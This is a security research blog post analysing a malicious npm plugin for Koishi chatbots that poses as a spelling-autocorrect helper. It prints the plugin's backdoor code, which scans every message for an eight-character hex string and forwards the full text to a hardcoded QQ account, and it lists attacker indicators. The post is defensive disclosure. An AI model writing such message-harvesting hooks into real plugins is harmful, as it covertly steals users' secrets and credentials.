Research
Security News
Kirill Boychenko
May 19, 2025
Socket’s Threat Research Team discovered a malicious npm package koishi‑plugin‑pinhaofa that plants a data‑exfiltration backdoor in Koishi chatbots. Marketed as a spelling‑autocorrect helper, the plugin scans every message for an eight‑character hexadecimal string. When it finds one, it forwards the full message, potentially including any embedded secrets or credentials, to a hardcoded QQ account.
Socket’s AI Scanner flags koishi‑plugin‑pinhaofa as “Known malware”.Chatbots have become a major channel for customer engagement. eMarketer predicts that by 2026 one in three U.S. adults will rely on banking chatbots. Koishi supports this growth with a TypeScript framework that lets developers run the same bot on QQ, Telegram, Discord, and other platforms from a single codebase. Its marketplace offers more than one thousand community plugins. Each plugin runs inside the bot process, giving it unrestricted access to read or modify every message.
Examples of key e‑commerce chatbot functions (Source: Botpress).
According to Wikipedia, 8 (eight) is the number following 7 and preceding 9. It also features in the breathtaking thriller, “Why was 6 afraid of 7? Because 7, 8, 9”. In Chinese and several other Asian cultures, eight symbolizes good luck. Reflecting that belief, the Beijing Summer Olympics began on 08/08/08 at precisely 8:08:08 p.m.
In koishi‑plugin‑pinhaofa the threat actor relies on an 8 (eight) character hexadecimal trigger. When the plugin sees such a string anywhere in a message, it immediately forwards the entire text to a hardcoded QQ account. Eight character hex often represent short Git commit hashes, truncated JWT or API tokens, CRC‑32 checksums, GUID lead segments, or device serial numbers, each of which can unlock wider systems or map internal assets. By harvesting the whole message the threat actor also scoops up any surrounding secrets, passwords, URLs, credentials, tokens, or IDs. The narrow trigger pulls in these high value artifacts while generating few false positives, keeping the threat actor’s inbox relevant and manageable.
Socket AI Scanner’s analysis, including contextual details about the malicious koishi-plugin-pinhaofa package.koishi‑plugin‑pinhaofa attaches silently to Koishi’s message stream, watches for any eight‑character hexadecimal sequence, and, when it finds one, forwards the full message to QQ UIN 1821181277. Tencent QQ, also known as QQ, is an instant messaging software service and web portal developed by the Mainland Chinese technology company Tencent.
Because Koishi plugins run inside the bot process and are installed directly from npm, the malicious koishi‑plugin‑pinhaofa package executes within the bot’s trusted runtime. If administrators add plugins without reviewing the code, this malicious package can:
The package was published by a threat actor using the npm alias kuminfennel, with a registration email 1821181277@qq[.]com, and a matching GitHub account, 1821181277 (hxxps://github[.]com/1821181277). The package is still live on the npm registry and the GitHub repository but we have petitioned its removal.
Below are annotated code snippets highlighting a data‑exfiltration functionality in the malicious koishi‑plugin‑pinhaofa package.
ctx.on("message", (session) => { // process every incoming message
const hexRegex = /(^|[^0-9A-Fa-f])([0-9A-Fa-f]{8})([^0-9A-Fa-f]|$)/;
const content = session.content.replace(" ", "");
if (hexRegex.test(content)) { // true if an exact 8‑char hex string exists
session.bot.sendPrivateMessage( // exfiltrate complete message text
"1821181277", // threat actor's QQ UIN
content);
session.bot.sendPrivateMessage(
extractAll8DigitHex(content)[0]);
}
});The threat actor succeeds by exploiting three conditions: Koishi loads every plugin directly inside the bot process, npm provides wide and convenient distribution, and developers often install helper plugins without rigorous review. The backdoor is just a few lines of code, with no obfuscation, extra dependencies, or outbound URL beyond a hardcoded QQ ID. Because the stolen data exits over the same chat protocol the bot normally uses, standard web filters and endpoint defenses may not notice the traffic.
Supply chain attacks against chatbot frameworks will rise as enterprises accelerate conversational chatbot deployments in finance, retail, and healthcare. To reduce the likelihood and impact of an incident, teams should place each bot in a container that can transmit messages only to approved domains or IDs, which blocks covert exfiltration even if a backdoor slips through. To avoid a backdoor compromise in the first place, strengthen the development pipeline with automated tooling: the free Socket GitHub application and CLI catch suspect patterns in pull requests and package installations, while the Socket browser extension surfaces risk scores during package selection, reducing the chance that a malicious plugin ever lands in your codebase.
koishi‑plugin‑pinhaofa1821181277kuminfennel1821181277@qq[.]comhxxps://github[.]com/1821181277Subscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Research
Security News
Socket’s Threat Research Team has uncovered 60 npm packages using post-install scripts to silently exfiltrate hostnames, IP addresses, DNS servers, and user directories to a Discord-controlled endpoint.
Security News
TypeScript Native Previews offers a 10x faster Go-based compiler, now available on npm for public testing with early editor and language support.
Research
Security News
Malicious npm packages targeting React, Vue, Vite, Node.js, and Quill remained undetected for two years while deploying destructive payloads.